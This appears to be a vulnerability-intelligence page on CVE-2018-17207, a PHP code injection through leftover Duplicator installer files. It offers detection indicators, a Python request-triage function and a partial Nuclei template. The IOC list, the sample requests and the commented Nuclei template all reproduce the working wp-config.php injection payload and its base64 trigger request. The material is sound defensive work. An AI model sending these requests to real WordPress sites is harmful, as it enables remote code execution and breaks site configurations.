CVE-2018-17207
Published 2018-09-19
Priority P1 · 87 · critical · CVSS 3.1 base score 9.8
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
Status: exploited in the wild (ITW), public exploit available, listed in VulnCheck KEV
EPSS: 57.56% (99.0th percentile)
An issue was discovered in Snap Creek Duplicator before 1.2.42. By accessing leftover installer files (installer.php and installer-backup.php), an attacker can inject PHP code into wp-config.php during the database setup step, achieving arbitrary code execution.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| awesomemotive | duplicator | < 1.2.42 | 1.2.42 |
Detection & IOCs (extracted from sources)
- command: POST /installer-backup.php HTTP/1.1
- command: action_ajax=3&action_step=3&dbhost=nowhere&dbuser=test&dbpass=test&dbname=wordpress');echo base64_decode($_GET["input"]);//&dbport=12345&
- path: /wp-config.php
- cookie: dupx-header-version
- Detect exploitation attempts by monitoring HTTP requests to the leftover installer files /installer.php and /installer-backup.php on WordPress installations.
- Look for POST requests to /installer-backup.php with the parameters action_ajax=3&action_step=3 and a dbname value containing PHP code (for example a single quote followed by PHP statements) as a sign of active exploitation.
- Fingerprint vulnerable Duplicator plugin instances by checking for the strings 'dupx-header-version' and 'Deployment Path:' in the HTTP response headers or body together with an HTTP 200 status.
- Flag WordPress sites running Duplicator plugin versions earlier than 1.2.42 as vulnerable.
- Monitor for unexpected modifications to wp-config.php, particularly injected PHP code, since the exploit overwrites this file with attacker-controlled content.
- Check for subsequent GET requests to /wp-config.php carrying a base64-encoded 'input' query parameter, which is used to trigger the injected PHP payload after exploitation.
- Exploitation WILL corrupt or overwrite wp-config.php; a successfully exploited site will have a broken WordPress configuration and should be restored from backup.
- The vulnerability only exists while the leftover installer files (installer.php, installer-backup.php) remain on the filesystem after a backup restoration; sites that have removed these files are not exposed.
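The request-level signals listed above, turned into a small triage function as an added example (not code from the page's sources or from the Duplicator project). It classifies one HTTP request at a time and runs over a constructed set of sample requests; the signal names and the decision that any unusual character in dbname counts are assumptions made here.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, urlsplit

# Paths and parameter names come from the CVE-2018-17207 IOCs above.
LEFTOVER_INSTALLERS = {"/installer.php", "/installer-backup.php"}
# A real database name never contains quotes, semicolons, parentheses, a PHP
# open tag or a superglobal reference (assumption used as the injection test).
SUSPICIOUS_DBNAME = re.compile(r"['\";()<]|\$_")


def looks_base64(value: str) -> bool:
    """True if the value decodes cleanly as base64, like the post-exploitation trigger."""
    try:
        base64.b64decode(value, validate=True)
        return len(value) > 0
    except (binascii.Error, ValueError):
        return False


def classify_request(method: str, url: str, body: str = "") -> list:
    """Return the detection signals raised by one request (empty list means nothing seen)."""
    parts = urlsplit(url)
    query, form = parse_qs(parts.query), parse_qs(body)
    signals = []
    if parts.path in LEFTOVER_INSTALLERS:
        signals.append("leftover-installer-access")  # any hit deserves a look
    if (method == "POST" and parts.path == "/installer-backup.php"
            and form.get("action_ajax") == ["3"] and form.get("action_step") == ["3"]):
        if SUSPICIOUS_DBNAME.search(form.get("dbname", [""])[0]):
            signals.append("wp-config-code-injection")  # database setup step with code in dbname
    if (method == "GET" and parts.path == "/wp-config.php"
            and any(looks_base64(v) for v in query.get("input", []))):
        signals.append("injected-payload-trigger")  # wp-config.php is never fetched directly
    return signals


# Constructed sample requests (not real traffic): a benign page view, a probe of the
# leftover installer, the database-setup POST from the IOCs, and the payload trigger.
SAMPLE_REQUESTS = [
    ("GET", "/index.php", ""),
    ("GET", "/installer-backup.php", ""),
    ("POST", "/installer-backup.php",
     "action_ajax=3&action_step=3&dbhost=nowhere&dbuser=test&dbpass=test"
     "&dbname=wordpress');echo base64_decode($_GET[\"input\"]);//&dbport=12345&"),
    ("GET", "/wp-config.php?input=bWFya2Vy", ""),  # "marker" in base64, constructed
]


def scan(requests=SAMPLE_REQUESTS) -> dict:
    """Map the index of each request that raised a signal to its list of signals."""
    hits = {}
    for i, (method, url, body) in enumerate(requests):
        signals = classify_request(method, url, body)
        if signals:
            hits[i] = signals
    return hits
```

Feed `classify_request` from whatever source retains request bodies (WAF or reverse-proxy logs); plain access logs only expose the path and query, so they can raise the first and last signal but not the dbname one.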
CVSS provenance
- NVD, v3.1: 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- NVD, v2.0: 7.5 HIGH, AV:N/AC:L/Au:N/C:P/I:P/A:P
- VulnCheck: 9.8 CRITICAL
GHSA
GHSA-4hvf-vmqm-x8p3 · ghsa_unreviewed · 2022-05-13 · CVE-2018-17207 [CRITICAL] · CWE-94
Description as above: leftover installer files in Snap Creek Duplicator before 1.2.42 allow PHP code injection into wp-config.php during the database setup step, achieving arbitrary code execution.
VulnCheck
CVE-2018-17207 [CRITICAL] · vulncheck · 2018 · CVSS 9.8
awesomemotive duplicator: Improper Control of Generation of Code ('Code Injection')
Affected: awesomemotive duplicator
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/duplicator/duplicator-1241-sensitive-information-disclosure-leading-to-remote-code-execution
No detection rules found.
Nuclei
CVE-2018-17207 [CRITICAL] · nuclei · CVSS 9.8
WordPress Duplicator Plugin < 1.2.42 - Arbitrary Code Execution

Template fragment (the head of the template is truncated in the source; the raw exploitation requests are commented out in the template itself):

```yaml
      words:
        - 'Duplicator'
        - 'dupx-header-version'
        - 'Deployment Path:'
      condition: and
    - type: status
      status:
        - 200
    - type: dsl
      dsl:
        - compare_versions(version, '< 1.2.42')

#  - raw:
#      - |-
#        POST /installer-backup.php HTTP/1.1
#        Host: {{Hostname}}
#        Content-Type: application/x-www-form-urlencoded
#        Connection: close
#
#        action_ajax=3&action_step=3&dbhost=nowhere&dbuser=test&dbpass=test&dbname=wordpress');echo base64_decode($_GET["input"]);//&dbport=12345&
#    matchers-condition: and
#    matchers:
#      - type: word
#        part: body
#        words:
#          - updt_rows
#          - scan_rows
#          - scan_tables
#        condition: and
#      - type: status
#        status:
#          - 200
#        internal: true
#  - raw:
#      - |+
#        GET /wp-config.php?input={{base64(marker)}} HTTP/1.1
#        Host: {{Hostname}}
#        Connection: close
#    matchers-condition:
```
Metasploit
Snap Creek Duplicator WordPress plugin code injection
When the WordPress plugin Snap Creek Duplicator restores a backup, it leaves dangerous files in the filesystem such as installer.php and installer-backup.php. These files allow anyone to call a function that overwrites the wp-config.php file AND this function does not sanitize POST parameters before inserting them inside the wp-config.php file, leading to arbitrary PHP code execution. WARNING: This exploit WILL break the wp-config.php file. If possible, try to restore backups of the configuration after the exploit to make the WordPress site work again.